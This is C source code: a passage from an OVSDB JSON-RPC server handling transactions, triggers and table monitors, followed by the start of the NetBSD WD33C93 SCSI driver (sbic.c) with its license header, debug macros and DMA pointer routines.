"transact")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = execute_transaction(s, request); } } else if (!strcmp(request->method, "monitor")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = jsonrpc_create_reply( ovsdb_jsonrpc_monitor_create(s, request->params), request->id); } } else if (!strcmp(request->method, "monitor_cancel")) { reply = ovsdb_jsonrpc_monitor_cancel(s, json_array(request->params), request->id); } else if (!strcmp(request->method, "get_schema")) { reply = ovsdb_jsonrpc_check_db_name(s, request); if (!reply) { reply = jsonrpc_create_reply( ovsdb_schema_to_json(s->remote->server->db->schema), request->id); } } else if (!strcmp(request->method, "list_dbs")) { reply = jsonrpc_create_reply( json_array_create_1(json_string_create(get_db_name(s))), request->id); } else if (!strcmp(request->method, "echo")) { reply = jsonrpc_create_reply(json_clone(request->params), request->id); } else { reply = jsonrpc_create_error(json_string_create("unknown method"), request->id); } if (reply) { jsonrpc_msg_destroy(request); jsonrpc_session_send(s->js, reply); } } static void execute_cancel(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { if (json_array(request->params)->n == 1) { struct ovsdb_jsonrpc_trigger *t; struct json *id; id = request->params->u.array.elems[0]; t = ovsdb_jsonrpc_trigger_find(s, id, json_hash(id, 0)); if (t) { ovsdb_jsonrpc_trigger_complete(t); } } } static void ovsdb_jsonrpc_session_got_notify(struct ovsdb_jsonrpc_session *s, struct jsonrpc_msg *request) { if (!strcmp(request->method, "cancel")) { execute_cancel(s, request); } jsonrpc_msg_destroy(request); } /* JSON-RPC database server triggers. * * (Every transaction is treated as a trigger even if it doesn't actually have * any "wait" operations.) */ struct ovsdb_jsonrpc_trigger { struct ovsdb_trigger trigger; struct ovsdb_jsonrpc_session *session; struct hmap_node hmap_node; /* In session's "triggers" hmap. 
*/ struct json *id; }; static void ovsdb_jsonrpc_trigger_create(struct ovsdb_jsonrpc_session *s, struct json *id, struct json *params) { struct ovsdb_jsonrpc_trigger *t; size_t hash; /* Check for duplicate ID. */ hash = json_hash(id, 0); t = ovsdb_jsonrpc_trigger_find(s, id, hash); if (t) { struct jsonrpc_msg *msg; msg = jsonrpc_create_error(json_string_create("duplicate request ID"), id); jsonrpc_session_send(s->js, msg); json_destroy(id); json_destroy(params); return; } /* Insert into trigger table. */ t = xmalloc(sizeof *t); ovsdb_trigger_init(s->remote->server->db, &t->trigger, params, &s->completions, time_msec()); t->session = s; t->id = id; hmap_insert(&s->triggers, &t->hmap_node, hash); /* Complete early if possible. */ if (ovsdb_trigger_is_complete(&t->trigger)) { ovsdb_jsonrpc_trigger_complete(t); } } static struct ovsdb_jsonrpc_trigger * ovsdb_jsonrpc_trigger_find(struct ovsdb_jsonrpc_session *s, const struct json *id, size_t hash) { struct ovsdb_jsonrpc_trigger *t; HMAP_FOR_EACH_WITH_HASH (t, hmap_node, hash, &s->triggers) { if (json_equal(t->id, id)) { return t; } } return NULL; } static void ovsdb_jsonrpc_trigger_complete(struct ovsdb_jsonrpc_trigger *t) { struct ovsdb_jsonrpc_session *s = t->session; if (jsonrpc_session_is_connected(s->js)) { struct jsonrpc_msg *reply; struct json *result; result = ovsdb_trigger_steal_result(&t->trigger); if (result) { reply = jsonrpc_create_reply(result, t->id); } else { reply = jsonrpc_create_error(json_string_create("canceled"), t->id); } jsonrpc_session_send(s->js, reply); } json_destroy(t->id); ovsdb_trigger_destroy(&t->trigger); hmap_remove(&s->triggers, &t->hmap_node); free(t); } static void ovsdb_jsonrpc_trigger_complete_all(struct ovsdb_jsonrpc_session *s) { struct ovsdb_jsonrpc_trigger *t, *next; HMAP_FOR_EACH_SAFE (t, next, hmap_node, &s->triggers) { ovsdb_jsonrpc_trigger_complete(t); } } static void ovsdb_jsonrpc_trigger_complete_done(struct ovsdb_jsonrpc_session *s) { while (!list_is_empty(&s->completions)) { struct ovsdb_jsonrpc_trigger *t = CONTAINER_OF(s->completions.next, struct ovsdb_jsonrpc_trigger, trigger.node); ovsdb_jsonrpc_trigger_complete(t); } } /* JSON-RPC database table monitors. */ enum ovsdb_jsonrpc_monitor_selection { OJMS_INITIAL = 1 << 0, /* All rows when monitor is created. */ OJMS_INSERT = 1 << 1, /* New rows. */ OJMS_DELETE = 1 << 2, /* Deleted rows. */ OJMS_MODIFY = 1 << 3 /* Modified rows. */ }; /* A particular column being monitored. */ struct ovsdb_jsonrpc_monitor_column { const struct ovsdb_column *column; enum ovsdb_jsonrpc_monitor_selection select; }; /* A particular table being monitored. */ struct ovsdb_jsonrpc_monitor_table { const struct ovsdb_table *table; /* This is the union (bitwise-OR) of the 'select' values in all of the * members of 'columns' below. */ enum ovsdb_jsonrpc_monitor_selection select; /* Columns being monitored. */ struct ovsdb_jsonrpc_monitor_column *columns; size_t n_columns; }; /* A collection of tables being monitored. */ struct ovsdb_jsonrpc_monitor { struct ovsdb_replica replica; struct ovsdb_jsonrpc_session *session; struct hmap_node node; /* In ovsdb_jsonrpc_session's "monitors". */ struct json *monitor_id; struct shash tables; /* Holds "struct ovsdb_jsonrpc_monitor_table"s. 
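 * Keyed by table name; filled in by ovsdb_jsonrpc_monitor_create().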
*/ }; static const struct ovsdb_replica_class ovsdb_jsonrpc_replica_class; struct ovsdb_jsonrpc_monitor *ovsdb_jsonrpc_monitor_find( struct ovsdb_jsonrpc_session *, const struct json *monitor_id); static void ovsdb_jsonrpc_monitor_destroy(struct ovsdb_replica *); static struct json *ovsdb_jsonrpc_monitor_get_initial( const struct ovsdb_jsonrpc_monitor *); static bool parse_bool(struct ovsdb_parser *parser, const char *name, bool default_value) { const struct json *json; json = ovsdb_parser_member(parser, name, OP_BOOLEAN | OP_OPTIONAL); return json ? json_boolean(json) : default_value; } struct ovsdb_jsonrpc_monitor * ovsdb_jsonrpc_monitor_find(struct ovsdb_jsonrpc_session *s, const struct json *monitor_id) { struct ovsdb_jsonrpc_monitor *m; HMAP_FOR_EACH_WITH_HASH (m, node, json_hash(monitor_id, 0), &s->monitors) { if (json_equal(m->monitor_id, monitor_id)) { return m; } } return NULL; } static void ovsdb_jsonrpc_add_monitor_column(struct ovsdb_jsonrpc_monitor_table *mt, const struct ovsdb_column *column, enum ovsdb_jsonrpc_monitor_selection select, size_t *allocated_columns) { struct ovsdb_jsonrpc_monitor_column *c; if (mt->n_columns >= *allocated_columns) { mt->columns = x2nrealloc(mt->columns, allocated_columns, sizeof *mt->columns); } c = &mt->columns[mt->n_columns++]; c->column = column; c->select = select; } static int compare_ovsdb_jsonrpc_monitor_column(const void *a_, const void *b_) { const struct ovsdb_jsonrpc_monitor_column *a = a_; const struct ovsdb_jsonrpc_monitor_column *b = b_; return a->column < b->column ? -1 : a->column > b->column; } static struct ovsdb_error * WARN_UNUSED_RESULT ovsdb_jsonrpc_parse_monitor_request(struct ovsdb_jsonrpc_monitor_table *mt, const struct json *monitor_request, size_t *allocated_columns) { const struct ovsdb_table_schema *ts = mt->table->schema; enum ovsdb_jsonrpc_monitor_selection select; const struct json *columns, *select_json; struct ovsdb_parser parser; struct ovsdb_error *error; ovsdb_parser_init(&parser, monitor_request, "table %s", ts->name); columns = ovsdb_parser_member(&parser, "columns", OP_ARRAY | OP_OPTIONAL); select_json = ovsdb_parser_member(&parser, "select", OP_OBJECT | OP_OPTIONAL); error = ovsdb_parser_finish(&parser); if (error) { return error; } if (select_json) { select = 0; ovsdb_parser_init(&parser, select_json, "table %s select", ts->name); if (parse_bool(&parser, "initial", true)) { select |= OJMS_INITIAL; } if (parse_bool(&parser, "insert", true)) { select |= OJMS_INSERT; } if (parse_bool(&parser, "delete", true)) { select |= OJMS_DELETE; } if (parse_bool(&parser, "modify", true)) { select |= OJMS_MODIFY; } error = ovsdb_parser_finish(&parser); if (error) { return error; } } else { select = OJMS_INITIAL | OJMS_INSERT | OJMS_DELETE | OJMS_MODIFY; } mt->select |= select; if (columns) { size_t i; if (columns->type != JSON_ARRAY) { return ovsdb_syntax_error(columns, NULL, "array of column names expected"); } for (i = 0; i < columns->u.array.n; i++) { const struct ovsdb_column *column; const char *s; if (columns->u.array.elems[i]->type != JSON_STRING) { return ovsdb_syntax_error(columns, NULL, "array of column names expected"); } s = columns->u.array.elems[i]->u.string; column = shash_find_data(&mt->table->schema->columns, s); if (!column) { return ovsdb_syntax_error(columns, NULL, "%s is not a valid " "column name", s); } ovsdb_jsonrpc_add_monitor_column(mt, column, select, allocated_columns); } } else { struct shash_node *node; SHASH_FOR_EACH (node, &ts->columns) { const struct ovsdb_column *column = node->data; if 
(column->index != OVSDB_COL_UUID) { ovsdb_jsonrpc_add_monitor_column(mt, column, select, allocated_columns); } } } return NULL; } static struct json * ovsdb_jsonrpc_monitor_create(struct ovsdb_jsonrpc_session *s, struct json *params) { struct ovsdb_jsonrpc_monitor *m = NULL; struct json *monitor_id, *monitor_requests; struct ovsdb_error *error = NULL; struct shash_node *node; struct json *json; if (json_array(params)->n != 3) { error = ovsdb_syntax_error(params, NULL, "invalid parameters"); goto error; } monitor_id = params->u.array.elems[1]; monitor_requests = params->u.array.elems[2]; if (monitor_requests->type != JSON_OBJECT) { error = ovsdb_syntax_error(monitor_requests, NULL, "monitor-requests must be object"); goto error; } if (ovsdb_jsonrpc_monitor_find(s, monitor_id)) { error = ovsdb_syntax_error(monitor_id, NULL, "duplicate monitor ID"); goto error; } m = xzalloc(sizeof *m); ovsdb_replica_init(&m->replica, &ovsdb_jsonrpc_replica_class); ovsdb_add_replica(s->remote->server->db, &m->replica); m->session = s; hmap_insert(&s->monitors, &m->node, json_hash(monitor_id, 0)); m->monitor_id = json_clone(monitor_id); shash_init(&m->tables); SHASH_FOR_EACH (node, json_object(monitor_requests)) { const struct ovsdb_table *table; struct ovsdb_jsonrpc_monitor_table *mt; size_t allocated_columns; const struct json *mr_value; size_t i; table = ovsdb_get_table(s->remote->server->db, node->name); if (!table) { error = ovsdb_syntax_error(NULL, NULL, "no table named %s", node->name); goto error; } mt = xzalloc(sizeof *mt); mt->table = table; shash_add(&m->tables, table->schema->name, mt); /* Parse columns. */ mr_value = node->data; allocated_columns = 0; if (mr_value->type == JSON_ARRAY) { const struct json_array *array = &mr_value->u.array; for (i = 0; i < array->n; i++) { error = ovsdb_jsonrpc_parse_monitor_request( mt, array->elems[i], &allocated_columns); if (error) { goto error; } } } else { error = ovsdb_jsonrpc_parse_monitor_request( mt, mr_value, &allocated_columns); if (error) { goto error; } } /* Check for duplicate columns. 
*/ qsort(mt->columns, mt->n_columns, sizeof *mt->columns, compare_ovsdb_jsonrpc_monitor_column); for (i = 1; i < mt->n_columns; i++) { if (mt->columns[i].column == mt->columns[i - 1].column) { error = ovsdb_syntax_error(mr_value, NULL, "column %s " "mentioned more than once", mt->columns[i].column->name); goto error; } } } return ovsdb_jsonrpc_monitor_get_initial(m); error: if (m) { ovsdb_remove_replica(s->remote->server->db, &m->replica); } json = ovsdb_error_to_json(error); ovsdb_error_destroy(error); return json; } static struct jsonrpc_msg * ovsdb_jsonrpc_monitor_cancel(struct ovsdb_jsonrpc_session *s, struct json_array *params, const struct json *request_id) { if (params->n != 1) { return jsonrpc_create_error(json_string_create("invalid parameters"), request_id); } else { struct ovsdb_jsonrpc_monitor *m; m = ovsdb_jsonrpc_monitor_find(s, params->elems[0]); if (!m) { return jsonrpc_create_error(json_string_create("unknown monitor"), request_id); } else { ovsdb_remove_replica(s->remote->server->db, &m->replica); return jsonrpc_create_reply(json_object_create(), request_id); } } } static void ovsdb_jsonrpc_monitor_remove_all(struct ovsdb_jsonrpc_session *s) { struct ovsdb_jsonrpc_monitor *m, *next; HMAP_FOR_EACH_SAFE (m, next, node, &s->monitors) { ovsdb_remove_replica(s->remote->server->db, &m->replica); } } static struct ovsdb_jsonrpc_monitor * ovsdb_jsonrpc_monitor_cast(struct ovsdb_replica *replica) { assert(replica->class == &ovsdb_jsonrpc_replica_class); return CONTAINER_OF(replica, struct ovsdb_jsonrpc_monitor, replica); } struct ovsdb_jsonrpc_monitor_aux { bool initial; /* Sending initial contents of table? */ const struct ovsdb_jsonrpc_monitor *monitor; struct json *json; /* JSON for the whole transaction. */ /* Current table. */ struct ovsdb_jsonrpc_monitor_table *mt; struct json *table_json; /* JSON for table's transaction. */ }; static bool any_reportable_change(const struct ovsdb_jsonrpc_monitor_table *mt, const unsigned long int *changed) { size_t i; for (i = 0; i < mt->n_columns; i++) { const struct ovsdb_jsonrpc_monitor_column *c = &mt->columns[i]; unsigned int idx = c->column->index; if (c->select & OJMS_MODIFY && bitmap_is_set(changed, idx)) { return true; } } return false; } static bool ovsdb_jsonrpc_monitor_change_cb(const struct ovsdb_row *old, const struct ovsdb_row *new, const unsigned long int *changed, void *aux_) { struct ovsdb_jsonrpc_monitor_aux *aux = aux_; const struct ovsdb_jsonrpc_monitor *m = aux->monitor; struct ovsdb_table *table = new ? new->table : old->table; enum ovsdb_jsonrpc_monitor_selection type; struct json *old_json, *new_json; struct json *row_json; char uuid[UUID_LEN + 1]; size_t i; if (!aux->mt || table != aux->mt->table) { aux->mt = shash_find_data(&m->tables, table->schema->name); aux->table_json = NULL; if (!aux->mt) { /* We don't care about rows in this table at all. Tell the caller * to skip it. */ return false; } } type = (aux->initial ? OJMS_INITIAL : !old ? OJMS_INSERT : !new ? OJMS_DELETE : OJMS_MODIFY); if (!(aux->mt->select & type)) { /* We don't care about this type of change (but do want to be called * back for changes to other rows in the same table). */ return true; } if (type == OJMS_MODIFY && !any_reportable_change(aux->mt, changed)) { /* Nothing of interest changed. 
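 * (None of this table's monitored columns is among the changed ones;
 * skip this row but keep getting callbacks for other rows in the table.)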
*/ return true; } old_json = new_json = NULL; if (type & (OJMS_DELETE | OJMS_MODIFY)) { old_json = json_object_create(); } if (type & (OJMS_INITIAL | OJMS_INSERT | OJMS_MODIFY)) { new_json = json_object_create(); } for (i = 0; i < aux->mt->n_columns; i++) { const struct ovsdb_jsonrpc_monitor_column *c = &aux->mt->columns[i]; const struct ovsdb_column *column = c->column; unsigned int idx = c->column->index; if (!(type & c->select)) { /* We don't care about this type of change for this particular * column (but we will care about it for some other column). */ continue; } if ((type == OJMS_MODIFY && bitmap_is_set(changed, idx)) || type == OJMS_DELETE) { json_object_put(old_json, column->name, ovsdb_datum_to_json(&old->fields[idx], &column->type)); } if (type & (OJMS_INITIAL | OJMS_INSERT | OJMS_MODIFY)) { json_object_put(new_json, column->name, ovsdb_datum_to_json(&new->fields[idx], &column->type)); } } /* Create JSON object for transaction overall. */ if (!aux->json) { aux->json = json_object_create(); } /* Create JSON object for transaction on this table. */ if (!aux->table_json) { aux->table_json = json_object_create(); json_object_put(aux->json, aux->mt->table->schema->name, aux->table_json); } /* Create JSON object for transaction on this row. */ row_json = json_object_create(); if (old_json) { json_object_put(row_json, "old", old_json); } if (new_json) { json_object_put(row_json, "new", new_json); } /* Add JSON row to JSON table. */ snprintf(uuid, sizeof uuid, UUID_FMT, UUID_ARGS(ovsdb_row_get_uuid(new ? new : old))); json_object_put(aux->table_json, uuid, row_json); return true; } static void ovsdb_jsonrpc_monitor_init_aux(struct ovsdb_jsonrpc_monitor_aux *aux, const struct ovsdb_jsonrpc_monitor *m, bool initial) { aux->initial = initial; aux->monitor = m; aux->json = NULL; aux->mt = NULL; aux->table_json = NULL; } static struct ovsdb_error * ovsdb_jsonrpc_monitor_commit(struct ovsdb_replica *replica, const struct ovsdb_txn *txn, bool durable OVS_UNUSED) { struct ovsdb_jsonrpc_monitor *m = ovsdb_jsonrpc_monitor_cast(replica); struct ovsdb_jsonrpc_monitor_aux aux; ovsdb_jsonrpc_monitor_init_aux(&aux, m, false); ovsdb_txn_for_each_change(txn, ovsdb_jsonrpc_monitor_change_cb, &aux); if (aux.json) { struct jsonrpc_msg *msg; struct json *params; params = json_array_create_2(json_clone(aux.monitor->monitor_id), aux.json); msg = jsonrpc_create_notify("update", params); jsonrpc_session_send(aux.monitor->session->js, msg); } return NULL; } static struct json * ovsdb_jsonrpc_monitor_get_initial(const struct ovsdb_jsonrpc_monitor *m) { struct ovsdb_jsonrpc_monitor_aux aux; struct shash_node *node; ovsdb_jsonrpc_monitor_init_aux(&aux, m, true); SHASH_FOR_EACH (node, &m->tables) { struct ovsdb_jsonrpc_monitor_table *mt = node->data; if (mt->select & OJMS_INITIAL) { struct ovsdb_row *row; HMAP_FOR_EACH (row, hmap_node, &mt->table->rows) { ovsdb_jsonrpc_monitor_change_cb(NULL, row, NULL, &aux); } } } return aux.json ? aux.json : json_object_create(); } static void ovsdb_jsonrpc_monitor_destroy(struct ovsdb_replica *replica) { struct ovsdb_jsonrpc_monitor *m = ovsdb_jsonrpc_monitor_cast(replica); struct shash_node *node; json_destroy(m->monitor_id); SHASH_FOR_EACH (node, &m->tables) { struct ovsdb_jsonrpc_monitor_table *mt = node->data; free(mt->columns); free(mt); } shash_destroy(&m->tables); hmap_remove(&m->session->monitors, &m->node); free(m); } static const struct ovsdb_replica_class ovsdb_jsonrpc_replica_class = { ovsdb_jsonrpc_monitor_commit, ovsdb_jsonrpc_monitor_destroy };
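/*
 * Illustrative usage sketch -- not part of the original file.  It shows how
 * a daemon would typically drive the module above: run the server, register
 * poll-loop wakeups, then sleep.  ovsdb_jsonrpc_server_create() and
 * ovsdb_jsonrpc_server_set_remotes() are assumed to be declared alongside
 * the run/wait functions above, poll_block() to come from the poll-loop
 * library, and the remote name is a made-up example.
 */
#if 0
static void
serve_forever(struct ovsdb *db, const struct shash *remotes)
{
    struct ovsdb_jsonrpc_server *svr = ovsdb_jsonrpc_server_create(db);

    /* 'remotes' maps connection names (e.g. "ptcp:6632") to
     * "struct ovsdb_jsonrpc_options *" values. */
    ovsdb_jsonrpc_server_set_remotes(svr, remotes);
    for (;;) {
        ovsdb_jsonrpc_server_run(svr);   /* Accept connections, service
                                          * sessions, complete triggers. */
        ovsdb_jsonrpc_server_wait(svr);  /* Register wakeup events. */
        poll_block();                    /* Sleep until there is work. */
    }
}
#endif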
627772.c
/* $NetBSD: sbic.c,v 1.9 1997/10/14 22:27:41 mark Exp $ */ /* * Copyright (c) 1994 Christian E. Hopps * Copyright (c) 1990 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * Van Jacobson of Lawrence Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * from: sbic.c,v 1.21 1996/01/07 22:01:54 */ #define UNPROTECTED_CSR #define DEBUG /*#define SBIC_DEBUG*/ /* * WD 33C93 scsi adaptor driver */ #include <sys/param.h> #include <sys/systm.h> #include <sys/device.h> #include <sys/kernel.h> /* For hz */ #include <sys/disklabel.h> #include <sys/dkstat.h> #include <sys/buf.h> #include <dev/scsipi/scsi_all.h> #include <dev/scsipi/scsipi_all.h> #include <dev/scsipi/scsiconf.h> #include <vm/vm.h> #include <vm/vm_kern.h> #include <vm/vm_page.h> /*#include <machine/pmap.h> #include <machine/cpu.h>*/ #include <machine/io.h> #include <machine/irqhandler.h> #include <arm32/podulebus/podulebus.h> #include <arm32/podulebus/sbicreg.h> #include <arm32/podulebus/sbicvar.h> #include <arm32/podulebus/ascreg.h> /* These are for bounce buffers */ /*#include <vm/pmap.h>*/ /* Since I can't find this in any other header files */ #define SCSI_PHASE(reg) (reg&0x07) /* * SCSI delays * In u-seconds, primarily for state changes on the SPC. 
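 * (Each count is consumed as one DELAY(1) pass through the polling loop
 * in sbicwait(), so the values below are approximately microseconds.)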
*/ #define SBIC_CMD_WAIT 50000 /* wait per step of 'immediate' cmds */ #define SBIC_DATA_WAIT 50000 /* wait per data in/out step */ #define SBIC_INIT_WAIT 50000 /* wait per step (both) during init */ #define b_cylin b_resid #define SBIC_WAIT(regs, until, timeo) sbicwait(regs, until, timeo, __LINE__) extern u_int kvtop(); int sbicicmd __P((struct sbic_softc *, int, int, void *, int, void *, int)); int sbicgo __P((struct sbic_softc *, struct scsipi_xfer *)); int sbicdmaok __P((struct sbic_softc *, struct scsipi_xfer *)); int sbicwait __P((sbic_regmap_p, char, int , int)); int sbiccheckdmap __P((void *, u_long, u_long)); int sbicselectbus __P((struct sbic_softc *, sbic_regmap_p, u_char, u_char, u_char)); int sbicxfstart __P((sbic_regmap_p, int, u_char, int)); int sbicxfout __P((sbic_regmap_p regs, int, void *, int)); int sbicfromscsiperiod __P((struct sbic_softc *, sbic_regmap_p, int)); int sbictoscsiperiod __P((struct sbic_softc *, sbic_regmap_p, int)); int sbicintr __P((struct sbic_softc *)); int sbicpoll __P((struct sbic_softc *)); int sbicnextstate __P((struct sbic_softc *, u_char, u_char)); int sbicmsgin __P((struct sbic_softc *)); int sbicxfin __P((sbic_regmap_p regs, int, void *)); int sbicabort __P((struct sbic_softc *, sbic_regmap_p, char *)); void sbicxfdone __P((struct sbic_softc *, sbic_regmap_p, int)); void sbicerror __P((struct sbic_softc *, sbic_regmap_p, u_char)); void sbicstart __P((struct sbic_softc *)); void sbicreset __P((struct sbic_softc *)); void sbic_scsidone __P((struct sbic_acb *, int)); void sbic_sched __P((struct sbic_softc *)); void sbic_save_ptrs __P((struct sbic_softc *, sbic_regmap_p,int,int)); void sbic_load_ptrs __P((struct sbic_softc *, sbic_regmap_p,int,int)); /* * Synch xfer parameters, and timing conversions */ int sbic_min_period = SBIC_SYN_MIN_PERIOD; /* in cycles = f(ICLK,FSn) */ int sbic_max_offset = SBIC_SYN_MAX_OFFSET; /* pure number */ int sbic_cmd_wait = SBIC_CMD_WAIT; int sbic_data_wait = SBIC_DATA_WAIT; int sbic_init_wait = SBIC_INIT_WAIT; /* * was broken before.. now if you want this you get it for all drives * on sbic controllers. 
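 * (sbicinit() fills in the per-target sbic_inhibit_sync[] entries from
 * the scsi_nosync/shift_nosync mask.)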
*/ u_char sbic_inhibit_sync[8]; int sbic_enable_reselect = 1; int sbic_clock_override = 0; int sbic_no_dma = 1; /* was 0 */ int sbic_parallel_operations = 1; #ifdef DEBUG sbic_regmap_p debug_sbic_regs; int sbicdma_ops = 0; /* total DMA operations */ int sbicdma_bounces = 0; /* number operations using bounce buffer */ int sbicdma_hits = 0; /* number of DMA chains that were contiguous */ int sbicdma_misses = 0; /* number of DMA chains that were not contiguous */ int sbicdma_saves = 0; #define QPRINTF(a) if (sbic_debug > 1) printf a int sbic_debug = 0; int sync_debug = 0; int sbic_dma_debug = 0; int reselect_debug = 0; int report_sense = 0; int data_pointer_debug = 0; u_char debug_asr, debug_csr, routine; void sbictimeout __P((struct sbic_softc *dev)); void sbic_dump __P((struct sbic_softc *dev)); #define CSR_TRACE_SIZE 32 #if CSR_TRACE_SIZE #define CSR_TRACE(w,c,a,x) do { \ int s = splbio(); \ csr_trace[csr_traceptr].whr = (w); csr_trace[csr_traceptr].csr = (c); \ csr_trace[csr_traceptr].asr = (a); csr_trace[csr_traceptr].xtn = (x); \ /* dma_cachectl(&csr_trace[csr_traceptr], sizeof(csr_trace[0]));*/ \ csr_traceptr = (csr_traceptr + 1) & (CSR_TRACE_SIZE - 1); \ /* dma_cachectl(&csr_traceptr, sizeof(csr_traceptr));*/ \ splx(s); \ } while (0) int csr_traceptr; int csr_tracesize = CSR_TRACE_SIZE; struct { u_char whr; u_char csr; u_char asr; u_char xtn; } csr_trace[CSR_TRACE_SIZE]; #else #define CSR_TRACE #endif #define SBIC_TRACE_SIZE 0 #if SBIC_TRACE_SIZE #define SBIC_TRACE(dev) do { \ int s = splbio(); \ sbic_trace[sbic_traceptr].sp = &s; \ sbic_trace[sbic_traceptr].line = __LINE__; \ sbic_trace[sbic_traceptr].sr = s; \ sbic_trace[sbic_traceptr].csr = csr_traceptr; \ /* dma_cachectl(&sbic_trace[sbic_traceptr], sizeof(sbic_trace[0]));*/ \ sbic_traceptr = (sbic_traceptr + 1) & (SBIC_TRACE_SIZE - 1); \ /* dma_cachectl(&sbic_traceptr, sizeof(sbic_traceptr));*/ \ /* if (dev) dma_cachectl(dev, sizeof(*dev));*/ \ splx(s); \ } while (0) int sbic_traceptr; int sbic_tracesize = SBIC_TRACE_SIZE; struct { void *sp; u_short line; u_short sr; int csr; } sbic_trace[SBIC_TRACE_SIZE]; #else #define SBIC_TRACE(dev) #endif #else #define QPRINTF #define CSR_TRACE #define SBIC_TRACE #endif /* * default minphys routine for sbic based controllers */ void sbic_minphys(bp) struct buf *bp; { /* * No max transfer at this level. */ minphys(bp); } /* * Save DMA pointers. Take into account partial transfer. Shut down DMA. 
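 * The residual transfer count is read back from the chip (SBIC_TC_GET)
 * and used to advance the kernel-virtual and physical data pointers by
 * the number of bytes actually transferred.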
*/ void sbic_save_ptrs(dev, regs, target, lun) struct sbic_softc *dev; sbic_regmap_p regs; int target, lun; { int count, asr, s; /* int csr; */ /* unsigned long ptr;*/ /* char *vptr;*/ struct sbic_acb* acb; /* extern vm_offset_t vm_first_phys;*/ SBIC_TRACE(dev); if( !dev->sc_cur ) return; if( !(dev->sc_flags & SBICF_INDMA) ) return; /* DMA not active */ s = splbio(); acb = dev->sc_nexus; count = -1; do { GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) { printf("sbic_save_ptrs: asr %02x canceled!\n", asr); splx(s); SBIC_TRACE(dev); return; } } while( asr & (SBIC_ASR_BSY|SBIC_ASR_CIP) ); /* Save important state */ /* must be done before dmastop */ acb->sc_dmacmd = dev->sc_dmacmd; SBIC_TC_GET(regs, count); /* Shut down DMA ====CAREFUL==== */ dev->sc_dmastop(dev); dev->sc_flags &= ~SBICF_INDMA; SBIC_TC_PUT(regs, 0); #ifdef DEBUG if(!count && sbic_debug) printf("%dcount0",target); if(data_pointer_debug == -1) printf("SBIC saving target %d data pointers from (%p,%x)%xASR:%02x", target, dev->sc_cur->dc_addr, dev->sc_cur->dc_count, acb->sc_dmacmd, asr); #endif /* Fixup partial xfers */ acb->sc_kv.dc_addr += (dev->sc_tcnt - count); acb->sc_kv.dc_count -= (dev->sc_tcnt - count); acb->sc_pa.dc_addr += (dev->sc_tcnt - count); acb->sc_pa.dc_count -= ((dev->sc_tcnt - count)>>1); acb->sc_tcnt = dev->sc_tcnt = count; #ifdef DEBUG if(data_pointer_debug) printf(" at (%p,%x):%x\n", dev->sc_cur->dc_addr, dev->sc_cur->dc_count,count); sbicdma_saves++; #endif splx(s); SBIC_TRACE(dev); } /* * DOES NOT RESTART DMA!!! */ void sbic_load_ptrs(dev, regs, target, lun) struct sbic_softc *dev; sbic_regmap_p regs; int target, lun; { int s, count; /* int i, asr;*/ char* vaddr; /* char* paddr;*/ struct sbic_acb *acb; SBIC_TRACE(dev); acb = dev->sc_nexus; if( !acb->sc_kv.dc_count ) { /* No data to xfer */ SBIC_TRACE(dev); return; } s = splbio(); dev->sc_last = dev->sc_cur = &acb->sc_pa; dev->sc_tcnt = acb->sc_tcnt; dev->sc_dmacmd = acb->sc_dmacmd; #ifdef DEBUG sbicdma_ops++; #endif if( !dev->sc_tcnt ) { /* sc_tcnt == 0 implies end of segment */ /* do kvm to pa mappings */ #if 0 /* mark */ paddr = acb->sc_pa.dc_addr = (char *) kvtop(acb->sc_kv.dc_addr); #endif vaddr = acb->sc_kv.dc_addr; count = acb->sc_kv.dc_count; #if 0 /* mark */ for(count = (NBPG - ((int)vaddr & PGOFSET)); count < acb->sc_kv.dc_count && (char*)kvtop(vaddr + count + 4) == paddr + count + 4; count += NBPG); #endif /* If it's all contiguous... */ if(count > acb->sc_kv.dc_count ) { count = acb->sc_kv.dc_count; #ifdef DEBUG sbicdma_hits++; #endif } else { #ifdef DEBUG sbicdma_misses++; #endif } acb->sc_tcnt = count; acb->sc_pa.dc_count = count >> 1; #ifdef DEBUG if(data_pointer_debug) printf("DMA recalc:kv(%p,%x)pa(%p,%lx)\n", acb->sc_kv.dc_addr, acb->sc_kv.dc_count, acb->sc_pa.dc_addr, acb->sc_tcnt); #endif } splx(s); #ifdef DEBUG if(data_pointer_debug) printf("SBIC restoring target %d data pointers at (%p,%x)%x\n", target, dev->sc_cur->dc_addr, dev->sc_cur->dc_count, dev->sc_dmacmd); #endif SBIC_TRACE(dev); } /* * used by specific sbic controller * * it appears that the higher level code does nothing with LUN's * so I will too. I could plug it in, however so could they * in scsi_scsi_cmd(). 
